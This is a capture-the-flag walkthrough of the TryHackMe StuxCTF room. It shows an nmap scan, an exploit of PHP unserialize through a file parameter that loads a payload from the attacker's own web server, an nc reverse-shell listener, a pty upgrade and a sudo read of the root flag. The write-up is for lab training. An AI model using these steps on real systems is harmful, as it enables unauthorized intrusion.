StuxCTF — TryHackMe — WriteUp

Hello. I’m Rahmos. Here is my StuxCTF — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opened ports:

nmap -A -T4 -p- -v <ip>

nmap

So there are 2 ports opened: 22(SSH), and 80(HTTP). First, let’s access the website.

website

Time to check the page source (Ctrl + U):

page source

Well I’ve found a hidden dir, but encoded. I need to find the format to decode it. Look at the hint:

hint

Ok here is the format. Let’s write a simple script to calculate that. You can find my script here. Running the script gave me the result:

result

Copy everything and access via browser:

hidden dir

Again, view the page source:

page source

I have the “hint”: /?file=. I’ve tried append it with /etc/passwd and other possible files’ names but it didn’t work. So I tried to look at the default page itself: /?file=index.php

/?file=index.php

It gave me a very long string. Let’s try decode it. I will use this link.

decode

First decode it from hex, it gave me the reverse base64 decode string. So let’s reverse this string and decode again from base64:

decode

Well looks like it’s the source code of index.php. First, it will check the file name input from /?file=, if it’s index.php, it will encode the index.php to the string I’ve seen above and print out. But if the input file name is everything else but not index.php, it will print “File no Exist!”. However, look at the “unserialize” line, it’s a vuln of this php code. It will deserialize any files uploaded to the server. Here’s the link to learn more about the vuln of PHP serialization.

Now I’ll write a simple PHP code to exploit this vuln.

php code

The white box will be your VPN ip. This php code will exec the command to spawn a reverse shell to my machine. In order to let it exec on the website, I have to serialize this file. So here’s my php code after serialized:

serialized

Now I will upload this “testshell.txt” file to the website via ?/file=

Start a http server on your machine:

python3 -m http.server 9000

or if you use python2:

python2 SimpleHTTPServer 9000

Then access the browser, append /?file=http://<your-VPN-ip>:9000/testshell.txt

upload

As you can see, the “testshell.txt” has been uploaded. Because the website will deserialize all the file in the server, so it also deserializes my “testshell.txt” to “myshell.php”.

Start a listener on your machine:

nc -lvnp 4444

Then append /myshell.php to the url and access, I’ve got the reverse shell into the target!

reverse shell

Spawn a tty shell for stability:

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

export TERM=xterm

Then move around to get the 1st user.txt:

user.txt

Now I’ll find a way to own root and get the final flag. First, sudo -l to check sudo right on this machine:

sudo -l

Well that’s easy! I can run any commands as sudo without password. Get the final flag:

sudo cat /root/root.txt

root.txt

The end.

HAPPY HACKING